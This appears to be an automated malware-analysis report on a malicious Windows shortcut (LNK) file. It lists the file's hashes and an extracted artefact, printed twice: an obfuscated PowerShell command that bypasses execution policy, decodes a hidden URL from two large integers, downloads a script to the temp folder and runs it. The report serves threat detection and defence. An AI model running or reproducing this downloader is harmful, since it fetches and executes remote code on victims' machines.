Characteristics
| Hash | Hash Value |
|---|---|
| MD5 | 22083435c8b11e5c35845dcd4e88e744 |
| Sha1 | 81c9b94b772e98d03862b077209f0fa3a4f30559 |
| Sha256 | 911d74d73741f55d8b7fadc1b429d3e02625217931b428cebb6516acd9f4787c |
| Sha384 | 6df07b6b3ed4719351037ba2365ad0cbc1fc98c51f07e926c2a277b4e13520c4a2d36cd6de916d027686fb7d577d9937 |
| Sha512 | d864426956a23fd66fdd6866aca1839f9af1ffc0cf028a3c811f80006eaf5582ba836c6476abb4dba87ae2326b31ec40caa3c582d901df37d4bd2b35c4928488 |
| SSDeep | 24:8/9SdmGjMDvSwjKUaWU3AcPWkp+/CWyp0zkwDPWXfITGC4wZVr4I0WK6c/6Cab7k:8lomeKpUQKKznP7t4wbUIA6q6Cax |
| TLSH | 274100100BA20239DAF78B35ECFA6213B5217906EA215F4F12D5435848B4111E966F3F |
File Structure
22083435c8b11e5c35845dcd4e88e744
Malicious
Artefacts
| Name | Value |
|---|---|
| LNK: Command Execution | powershell.exe -ep bypass -c "$q=[bigint]\"826562940700966331525735653278350667138702576593\";$y=[bigint]\"190580670986420006407958954826012329000314514014\";$m=$q - $y;while($m -ne 0){$l+=[char]([int]($m -band 255));$m=$m -shr 8};iwr $l -OutFile $env:TEMP\xHlKd.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\xHlKd.ps1" |
22083435c8b11e5c35845dcd4e88e744 (1.89 KB)
Characteristics
No malware configuration was found at this point.
Artefacts
| Name | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -ep bypass -c "$q=[bigint]\"826562940700966331525735653278350667138702576593\";$y=[bigint]\"190580670986420006407958954826012329000314514014\";$m=$q - $y;while($m -ne 0){$l+=[char]([int]($m -band 255));$m=$m -shr 8};iwr $l -OutFile $env:TEMP\xHlKd.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\xHlKd.ps1" Malicious | 22083435c8b11e5c35845dcd4e88e744 |